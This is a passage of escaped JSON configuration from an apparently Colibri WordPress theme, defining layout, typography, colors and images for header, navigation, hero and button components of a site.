x\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"props\":{\"hoverEffect\":{\"type\":\"bordered-active-item bordered-active-item--bottom\",\"activeGroup\":\"border\",\"group\":{\"border\":{\"transition\":\"effect-borders-grow grow-from-center\"}},\"enabled\":true},\"sticky\":true,\"showOffscreenMenuOn\":\"has-offcanvas-tablet\"},\"v\":\"1.1\",\"nodes\":[\"7-h9\",\"22-h9\"]},{\"id\":10,\"type\":\"hop-mobile-menu\",\"nodeId\":\"11-h33\",\"v\":\"1.1\",\"nodes\":[\"7-h10\",\"10-h10\",\"22-h10\"]},{\"id\":11,\"type\":\"hop-offscreen-panel\",\"nodeId\":\"11-h34\",\"v\":\"1.1\",\"nodes\":[\"7-h11\",\"10-h11\",\"22-h11\"]},{\"id\":12,\"type\":\"hop-row\",\"nodeId\":\"11-h36\",\"v\":\"1.1\",\"nodes\":[\"7-h13\",\"10-h13\",\"22-h13\"]},{\"id\":13,\"type\":\"hop-column\",\"nodeId\":\"11-h37\",\"v\":\"1.1\",\"nodes\":[\"7-h14\",\"10-h14\",\"22-h14\"]},{\"id\":14,\"type\":\"hop-logo\",\"nodeId\":\"11-h38\",\"v\":\"1.1\",\"nodes\":[\"7-h15\",\"10-h15\",\"22-h15\"],\"props\":{\"layoutType\":\"text\"}},{\"id\":15,\"type\":\"hop-row\",\"nodeId\":\"11-h39\",\"v\":\"1.1\",\"nodes\":[\"7-h16\",\"10-h16\",\"22-h16\"]},{\"id\":16,\"type\":\"hop-column\",\"nodeId\":\"11-h40\",\"v\":\"1.1\",\"nodes\":[\"7-h17\",\"10-h17\",\"22-h17\"]},{\"id\":17,\"style\":{\"descendants\":{\"link\":{\"typography\":{\"color\":\"white\"}},\"submenu-item-link\":{\"typography\":{\"color\":\"white\"}},\"iconOption\":{\"typography\":{\"color\":\"white\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"white\"}}}},\"props\":{\"layout\":\"accordion\"},\"type\":\"hop-accordion-menu\",\"nodeId\":\"11-h35\",\"v\":\"1.1\",\"nodes\":[\"7-h12\",\"10-h12\",\"22-h12\"]},{\"id\":18,\"type\":\"hop-top-bar\",\"props\":{\"width\":\"boxed\"},\"v\":\"1.1\",\"nodes\":[\"7-h19\",\"10-h19\",\"22-h18\"]},{\"id\":19,\"style\":{\"background\":{\"color\":\"black\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\",\"value\":\"15\"}}},\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"fullBackground\":true,\"hide\":{\"mobile\":true}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h20\",\"10-h20\",\"22-h19\"]},{\"id\":20,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"7-h21\",\"10-h21\",\"22-h20\"]},{\"id\":21,\"type\":\"hop-icon-list\",\"style\":{\"descendants\":{\"li\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"divider\":{\"border\":{\"left\":{\"width\":{\"value\":1,\"unit\":\"px\"}},\"bottom\":{\"width\":{\"value\":0,\"unit\":\"px\"}}},\"height\":{\"value\":100,\"unit\":\"%\"}},\"containerDivider\":{\"height\":{\"value\":100,\"unit\":\"%\"},\"width\":{\"value\":1,\"unit\":\"px\"},\"padding\":{\"left\":{\"value\":10,\"unit\":\"px\"},\"top\":{\"value\":0,\"unit\":\"px\"},\"right\":{\"value\":10,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"icon\":{\"width\":{\"path\":\"value\",\"value\":\"18\"},\"fill\":\"${theme.colors.4}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\",\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"}}},\"height\":{\"path\":\"value\",\"value\":\"18\"},\"border\":{\"top\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\",\"path\":\"value\"}}},\"text\":{\"margin\":{\"left\":{\"path\":\"value\",\"value\":\"5\"}},\"color\":\"${theme.colors.4}\",\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"list-item\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}},\"horizontalAlign\":\"start\"}}},\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #1\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.15907223444395013},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #2\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.34341111083051734},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #3\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.0941660601972718},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #4\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.5295691579821964}],\"iconAndTextAlign\":\"center\",\"listLayout\":\"horizontal\"},\"v\":\"1.1\",\"nodes\":[\"7-h22\",\"10-h22\",\"22-h21\"]},{\"id\":22,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h23\",\"10-h23\",\"22-h22\"]},{\"id\":23,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon-content\":{\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\"}},\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"}},\"icon\":{\"margin\":{\"right\":{\"value\":\"0\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}}}},\"props\":{\"horizontalAlign\":\"end\",\"media\":{\"mobile\":{\"horizontalAlign\":\"center\"}},\"hide\":{\"mobile\":false}},\"v\":\"1.1\",\"nodes\":[\"7-h24\",\"10-h24\",\"22-h23\"]},{\"id\":24,\"style\":{\"typography\":{\"holders\":{\"h1\":{\"color\":\"${theme.colors.4}\"},\"h2\":{\"color\":\"${theme.colors.4}\"},\"h3\":{\"color\":\"${theme.colors.4}\"},\"h4\":{\"color\":\"${theme.colors.4}\"},\"h5\":{\"color\":\"${theme.colors.4}\"},\"h6\":{\"color\":\"${theme.colors.4}\"},\"p\":{\"color\":\"${theme.colors.4}\"}}},\"background\":{\"type\":\"image\",\"overlay\":{\"enabled\":true,\"type\":\"color\",\"gradient\":{\"angle\":\"-20\",\"steps\":[{\"color\":\"rgba(183,33,255, 0.4)\",\"position\":\"0\"},{\"color\":\"rgba(33,212,253, 0.4)\",\"position\":\"100\"}],\"name\":\"october_silence\"},\"shape\":{\"value\":\"none\",\"isTile\":false,\"img\":\"data:image\\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAALEgAACxIB0t1+\\/AAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAAAANSURBVAiZY\\/j\\/\\/z8DAAj8Av6Fzas0AAAAAElFTkSuQmCC\"},\"color\":{\"opacity\":0.4,\"value\":\"#000000\",\"opacity_\":40},\"light\":false},\"image\":[{\"source\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/header-scaled.jpg\",\"gradient\":{\"name\":\"october_silence\",\"angle\":0,\"steps\":[{\"position\":\"0\",\"color\":\"#b721ff\"},{\"position\":\"100\",\"color\":\"#21d4fd\"}]}},\"attachment\":\"scroll\",\"position\":\"center center\",\"repeat\":\"no-repeat\",\"size\":\"cover\",\"useParallax\":false}],\"color\":\"#03a9f4\",\"slideshow\":{\"duration\":{\"value\":1500},\"speed\":{\"value\":500},\"slides\":[{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/beach-landscape-sea-water-nature-sand-1061655-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/landscape-tree-water-nature-grass-outdoor-1327743-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/leaf-nature-water-green-freshness-dew-1440543-pxhere.com.jpg\"}]},\"video\":{\"videoType\":\"external\",\"externalUrl\":\"https:\\/\\/www.youtube.com\\/watch?v=coYirc_qoSA\",\"internalUrl\":false,\"poster\":{\"url\":\"https:\\/\\/static.colibriwp.com\\/assets\\/sources\\/colibri-demo-video-cover.jpg\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"200\",\"path\":\"value\"},\"bottom\":{\"unit\":\"px\",\"value\":\"200\",\"path\":\"value\"}},\"separatorBottom\":{\"enabled\":false,\"type\":\"mountains\",\"color\":\"#FFF\",\"height\":{\"value\":100},\"negative\":false}},\"props\":{\"heroSection\":{\"layout\":\"textOnly\",\"mediaType\":\"hop-image\"},\"attrs\":{\"name\":\"hero\",\"id\":\"hero\"},\"layoutType\":\"textWithMediaOnRight\"},\"type\":\"hop-hero\",\"v\":\"1.1\",\"nodes\":[\"7-h25\",\"22-h24\"]},{\"id\":25,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":3,\"verticalInnerGap\":3}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h26\",\"22-h25\"]},{\"id\":26,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"right\":{\"style\":\"solid\"},\"bottom\":{\"style\":\"solid\",\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"left\":{\"style\":\"solid\"}},\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"v\":\"1.1\",\"nodes\":[\"7-h27\",\"22-h26\"]},{\"id\":27,\"props\":{\"headerType\":\"1\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"7-h28\",\"22-h27\"],\"style\":{\"typography\":{\"weight\":\"600\"},\"textAlign\":\"center\"}},{\"id\":28,\"props\":{\"type\":\"lead\"},\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"7-h29\",\"22-h28\"]},{\"id\":29,\"type\":\"hop-button-group\",\"v\":\"1.1\",\"nodes\":[\"7-h30\",\"22-h29\"]},{\"id\":30,\"style\":{\"background\":{\"color\":\"${theme.colors.0}\",\"type\":\"none\",\"image\":[{\"source\":{\"type\":\"gradient\",\"gradient\":{\"angle\":\"0\",\"steps\":[{\"color\":\"#00c6fb\",\"position\":\"0\"},{\"color\":\"#005bea\",\"position\":\"100\"}]}}}]},\"typography\":{\"color\":\"white\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"weight\":\"600\",\"transform\":\"uppercase\",\"lineHeight\":{\"value\":\"1\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"unit\":\"px\",\"value\":\"15\"},\"left\":{\"unit\":\"px\",\"value\":\"30\"},\"right\":{\"unit\":\"px\",\"value\":\"30\"}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"textAlign\":\"center\"},\"type\":\"hop-button\",\"props\":{\"buttonSize\":\"large\"},\"v\":\"1.1\",\"nodes\":[\"7-h31\",\"22-h30\"]},{\"id\":31,\"style\":{\"background\":{\"color\":\"transparent\"},\"typography\":{\"color\":\"white\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"weight\":\"600\",\"transform\":\"uppercase\",\"lineHeight\":{\"value\":\"1\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"}},\"border\":{\"top\":{\"color\":\"white\",\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"color\":\"white\",\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"white\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"color\":\"white\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"unit\":\"px\",\"value\":\"15\"},\"left\":{\"unit\":\"px\",\"value\":\"30\"},\"right\":{\"unit\":\"px\",\"value\":\"30\"}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(255, 255, 255, 0.25)\"},\"border\":{\"top\":{\"color\":\"${theme.colors.4}\"},\"left\":{\"color\":\"${theme.colors.4}\"},\"right\":{\"color\":\"${theme.colors.4}\"},\"bottom\":{\"color\":\"${theme.colors.4}\"}}}},\"textAlign\":\"center\"},\"type\":\"hop-button\",\"props\":{\"buttonSize\":\"large\"},\"v\":\"1.1\",\"nodes\":[\"7-h32\",\"22-h31\"]},{\"id\":32,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"nodeId\":\"7-h35\",\"nodes\":[\"7-h33\"],\"v\":\"1.1\"},{\"id\":33,\"type\":\"hop-image\",\"nodeId\":\"7-h36\",\"nodes\":[\"7-h34\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"overlay\":{\"background\":{\"overlay\":{\"enabled\":false}}}}},\"props\":{\"enabledFrameOption\":true}},{\"id\":34,\"type\":\"hop-header\",\"nodeId\":\"4443-h1\",\"v\":\"1.1\",\"nodes\":[\"10-h1\",\"25-h1\"]},{\"id\":35,\"style\":{\"ancestor\":{\"sticky\":{\"background\":{\"color\":\"#ffffff\"},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"10\"},\"bottom\":{\"path\":\"value\",\"value\":\"10\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"0\",\"blur\":\"4\"}]}}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"bottom\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"background\":{\"color\":\"transparent\"}},\"type\":\"hop-navigation\",\"props\":{\"overlap\":true,\"sticky\":true,\"stickyStartAt\":\"immediately\",\"showTopBar\":false,\"width\":\"boxed\",\"layoutType\":\"logo-spacing-menu\"},\"v\":\"1.1\",\"nodes\":[\"10-h2\",\"25-h2\"],\"nodeId\":\"10-h2\"},{\"id\":36,\"props\":{\"containerWidth\":\"boxed\",\"layout\":{\"equalWidth\":false,\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h3\",\"10-h3\",\"25-h3\"]},{\"id\":37,\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"10-h4\",\"25-h4\"],\"nodeId\":\"10-h4\"},{\"id\":38,\"type\":\"hop-logo\",\"props\":{\"horizontalTextAlign\":\"left\",\"media\":{\"mobile\":{\"horizontalTextAlign\":\"left\"}},\"layoutType\":\"text\"},\"v\":\"1.1\",\"nodes\":[\"10-h5\",\"25-h5\"],\"style\":{\"descendants\":{\"logo-text\":{\"typography\":{\"color\":\"${theme.colors.4}\"}},\"text\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"24\"}}}}},\"nodeId\":\"10-h5\"},{\"id\":39,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"props\":{\"verticalAlign\":\"center\",\"hide\":{\"mobile\":true}},\"type\":\"hop-column\",\"nodeId\":\"10-h6\",\"v\":\"1.1\",\"nodes\":[\"10-h6\",\"25-h6\"]},{\"id\":40,\"type\":\"hop-spacer\",\"nodeId\":\"7-h78\",\"v\":\"1.1\",\"nodes\":[\"7-h7\",\"10-h7\",\"25-h7\"]},{\"id\":41,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"textAlign\":\"center\",\"media\":{\"mobile\":{\"textAlign\":\"center\"}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"10-h8\",\"25-h8\"],\"nodeId\":\"10-h8\"},{\"id\":42,\"type\":\"hop-horizontal-menu\",\"style\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"props\":{\"hoverEffect\":{\"type\":\"bordered-active-item bordered-active-item--bottom\",\"activeGroup\":\"border\",\"group\":{\"border\":{\"transition\":\"effect-borders-grow grow-from-center\"}},\"enabled\":true},\"sticky\":true,\"showOffscreenMenuOn\":\"has-offcanvas-tablet\"},\"v\":\"1.1\",\"nodes\":[\"10-h9\",\"25-h9\"],\"nodeId\":\"10-h9\"},{\"id\":43,\"type\":\"hop-mobile-menu\",\"nodeId\":\"11-h33\",\"v\":\"1.1\",\"nodes\":[\"7-h10\",\"10-h10\",\"25-h10\"]},{\"id\":44,\"type\":\"hop-offscreen-panel\",\"nodeId\":\"11-h34\",\"v\":\"1.1\",\"nodes\":[\"7-h11\",\"10-h11\",\"25-h11\"]},{\"id\":45,\"type\":\"hop-row\",\"nodeId\":\"11-h36\",\"v\":\"1.1\",\"nodes\":[\"7-h13\",\"10-h13\",\"25-h13\"]},{\"id\":46,\"type\":\"hop-column\",\"nodeId\":\"11-h37\",\"v\":\"1.1\",\"nodes\":[\"7-h14\",\"10-h14\",\"25-h14\"]},{\"id\":47,\"type\":\"hop-logo\",\"nodeId\":\"11-h38\",\"v\":\"1.1\",\"nodes\":[\"7-h15\",\"10-h15\",\"25-h15\"],\"props\":{\"layoutType\":\"text\"}},{\"id\":48,\"type\":\"hop-row\",\"nodeId\":\"11-h39\",\"v\":\"1.1\",\"nodes\":[\"7-h16\",\"10-h16\",\"25-h16\"]},{\"id\":49,\"type\":\"hop-column\",\"nodeId\":\"11-h40\",\"v\":\"1.1\",\"nodes\":[\"7-h17\",\"10-h17\",\"25-h17\"]},{\"id\":50,\"style\":{\"descendants\":{\"link\":{\"typography\":{\"color\":\"white\"}},\"submenu-item-link\":{\"typography\":{\"color\":\"white\"}},\"iconOption\":{\"typography\":{\"color\":\"white\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"white\"}}}},\"props\":{\"layout\":\"accordion\"},\"type\":\"hop-accordion-menu\",\"nodeId\":\"11-h35\",\"v\":\"1.1\",\"nodes\":[\"7-h12\",\"10-h12\",\"25-h12\"]},{\"id\":51,\"type\":\"hop-top-bar\",\"props\":{\"width\":\"boxed\"},\"v\":\"1.1\",\"nodes\":[\"7-h19\",\"10-h19\",\"25-h18\"]},{\"id\":52,\"style\":{\"background\":{\"color\":\"black\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\",\"value\":\"15\"}}},\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"fullBackground\":true,\"hide\":{\"mobile\":true}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h20\",\"10-h20\",\"25-h19\"]},{\"id\":53,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"7-h21\",\"10-h21\",\"25-h20\"]},{\"id\":54,\"type\":\"hop-icon-list\",\"style\":{\"descendants\":{\"li\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"divider\":{\"border\":{\"left\":{\"width\":{\"value\":1,\"unit\":\"px\"}},\"bottom\":{\"width\":{\"value\":0,\"unit\":\"px\"}}},\"height\":{\"value\":100,\"unit\":\"%\"}},\"containerDivider\":{\"height\":{\"value\":100,\"unit\":\"%\"},\"width\":{\"value\":1,\"unit\":\"px\"},\"padding\":{\"left\"